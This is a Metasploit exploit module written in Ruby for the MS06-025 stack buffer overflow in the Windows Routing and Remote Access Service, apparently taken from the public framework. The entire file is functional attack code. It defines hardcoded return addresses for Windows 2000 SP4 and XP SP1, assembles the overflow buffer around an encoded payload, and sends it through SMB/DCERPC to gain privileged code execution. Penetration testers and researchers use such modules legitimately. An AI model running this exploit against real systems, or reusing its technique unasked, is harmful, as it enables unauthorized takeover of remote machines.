1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'MS06-025 Microsoft RRAS Service Overflow',
17
        'Description' => %q{
18
          This module exploits a stack buffer overflow in the Windows Routing and Remote
19
          Access Service. Since the service is hosted inside svchost.exe, a failed
20
          exploit attempt can cause other system services to fail as well. A valid
21
          username and password is required to exploit this flaw on Windows 2000.
22
          When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
23
        },
24
        'Author' => [
25
          'Nicolas Pouvesle <nicolas.pouvesle[at]gmail.com>',
26
          'hdm'
27
        ],
28
        'License' => MSF_LICENSE,
29
        'References' => [
30
          [ 'CVE', '2006-2370' ],
31
          [ 'OSVDB', '26437' ],
32
          [ 'BID', '18325' ],
33
          [ 'MSB', 'MS06-025' ]
34
        ],
35
        'DefaultOptions' => {
36
          'EXITFUNC' => 'thread',
37
        },
38
        'Privileged' => true,
39
        'Payload' => {
40
          'Space' => 1104,
41
          'BadChars' => "\x00",
42
          'StackAdjustment' => -3500,
43
        },
44
        'Platform' => 'win',
45
        'Targets' => [
46
          [ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
47
          [ 'Windows XP SP1', { 'Ret' => 0x7248d4cc } ],
48
        ],
49

50
        'DisclosureDate' => '2006-06-13',
51
        'Notes' => {
52
          'Reliability' => UNKNOWN_RELIABILITY,
53
          'Stability' => UNKNOWN_STABILITY,
54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
55
        }
56
      )
57
    )
58

59
    register_options(
60
      [
61
        OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
62
      ]
63
    )
64

65
    deregister_options('SMB::ProtocolVersion')
66
  end
67

68
  # Post authentication bugs are rarely useful during automation
69
  def autofilter
70
    false
71
  end
72

73
  def exploit
74
    connect(versions: [1])
75
    smb_login()
76

77
    handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
78

79
    print_status("Binding to #{handle} ...")
80
    dcerpc_bind(handle)
81
    print_status("Bound to #{handle} ...")
82

83
    print_status('Getting OS...')
84

85
    # Check the remote OS name and version
86
    os = smb_peer_os
87
    pat = ''
88

89
    case os
90
    when /Windows 5\.0/
91
      pat =
92
        payload.encoded +
93
        "\xeb\x06" +
94
        rand_text_alphanumeric(2) +
95
        [target.ret].pack('V') +
96
        "\xe9\xb7\xfb\xff\xff"
97
      os = 'Windows 2000'
98
    when /Windows 5\.1/
99
      pat =
100
        rand_text_alphanumeric(0x4c) +
101
        "\xeb\x06" +
102
        rand_text_alphanumeric(2) +
103
        [target.ret].pack('V') +
104
        payload.encoded
105
      os = 'Windows XP'
106
    end
107

108
    req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000 - pat.length)
109
    len = req.length
110
    stb =
111
      NDR.long(0x20000) +
112
      NDR.long(len) +
113
      req +
114
      NDR.long(len)
115

116
    print_status("Calling the vulnerable function on #{os}...")
117

118
    begin
119
      dcerpc.call(0x0C, stb)
120
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
121
    rescue => e
122
      if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
123
        raise e
124
      end
125
    end
126

127
    # Cleanup
128
    handler
129
    disconnect
130
  end
131
end
132

133